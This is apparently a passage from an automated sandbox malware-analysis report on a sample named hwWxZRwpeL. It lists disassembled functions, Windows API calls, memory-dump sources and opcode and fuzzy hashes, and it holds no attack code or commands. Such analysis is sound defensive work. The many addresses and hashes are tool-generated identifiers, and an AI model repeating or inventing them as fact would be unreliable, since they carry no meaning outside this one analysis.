                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                                                                                                                                                                                                                                                                                                                  Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: BinaryCryptString
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 80407269-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                                                                                                                                                                                                                                                                                                                  Function 6C616CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C616D45
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C616E1E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4169067295-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e17bb4726eac38f8f6cdff6bf3e09698db4e91d57506c444e15894a893f492d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a567c54825c9d0dd4802e5889b2207c3e97fdcc5694001012915b9adaaaaa60a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e17bb4726eac38f8f6cdff6bf3e09698db4e91d57506c444e15894a893f492d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58A17F746183818FC715CF29C4907AEBBE2FF89308F54491DE48A87B51DB70E849CB9A
                                                                                                                                                                                                                                                                                                                                  Function 6C5F4640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C5F4777
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1351931279
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a5a50101316972e9e182af14c6607f88afb24aee17291698ae0f2ebdc8f0bc6d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2d2aa7742d5b731d71ae67a5874b760f92b925f03d4e20c4982d9523ba86ab2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5a50101316972e9e182af14c6607f88afb24aee17291698ae0f2ebdc8f0bc6d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2B25C71A056018FD709CF29CA90615BBE2BFC5324B29C76DE47A8B7A5D771E842CF80
                                                                                                                                                                                                                                                                                                                                  Function 6C6385F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3732870572-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ebf74af3fb99a8c5bf9fb8866be4cc2633d914b14831cfd284b0dc9c04efdbc4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A326F31F001298BDF18CE9DC8A17EEB7B2EB89304F15A12BD40AFB7A0D6345D458B95
                                                                                                                                                                                                                                                                                                                                  Function 6C646E63 Relevance: 1.7, Strings: 1, Instructions: 498COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ~q]l
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3028681918
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4913812fa37c5a956e07bc23339cc396eff2b2b772d2db93f5219421394c71e7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D122D771E006198FCB14CF98C880AADF7F2FF89308F6585A9C949A7745D731A986CF94
                                                                                                                                                                                                                                                                                                                                  Function 6C615C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memcmp.VCRUNTIME140(?,?,6C5E4A63,?,?), ref: 6C615F06
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: af576c2cf9e9417f77c2ca8f6032fcaac8f8c068b92d7645047f1a794fe0d5c4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 741a313e849ee4dc7c16685333abf84a58ab04491cfe60fb1b9412eec6b075f5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af576c2cf9e9417f77c2ca8f6032fcaac8f8c068b92d7645047f1a794fe0d5c4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23C19D75E052498FCB04CF99C1906EEFBF2BF8A319F288159D8556BB44D732A806CF94
                                                                                                                                                                                                                                                                                                                                  Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,00798860,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: SystemTimelstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 62757014-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 330fb061029940234d2d8ded1b1a4459c0fa61af96ac75ddba8bfd12d218c8ec
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 330fb061029940234d2d8ded1b1a4459c0fa61af96ac75ddba8bfd12d218c8ec
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                                                                                                                                                                                                                                                                                                                  Function 0041D21A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                                                                                                                                                                                                                                                                                                                  Function 6C600512 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 19de1656de91102e459d0925be66ab7856cbe58f7b598c0cf805078c4df466ef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C221671E046198FCB18CF98C990AADF7B2FF89308F548299C54AB7745D731A986CF84
                                                                                                                                                                                                                                                                                                                                  Function 6C64AC00 Relevance: .4, Instructions: 445COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4131b3a1c0706f4b443e9dd052da4bda3e88b09b48611a714eb6196e45db41be
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3d870cb035298b8a5d441383b670dc1126e9188ebc4a8e7302ebbf7b33658fce
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4131b3a1c0706f4b443e9dd052da4bda3e88b09b48611a714eb6196e45db41be
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AF14772608745AFD700CE28C8807AEB7E2AFC6319F14CA3DE4D4877C2E37498858796
                                                                                                                                                                                                                                                                                                                                  Function 6C5DC670 Relevance: .3, Instructions: 285COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 21f6ace8cee4ae7ffb7713cda4769ab346ce877174a7e28a6080b5139fef2ac9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBA19F71F0061A8FDB08CE6DC8917AEB7F2AFC9354F198169D915E7781DB34AC068B90
                                                                                                                                                                                                                                                                                                                                  Function 00419AA0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
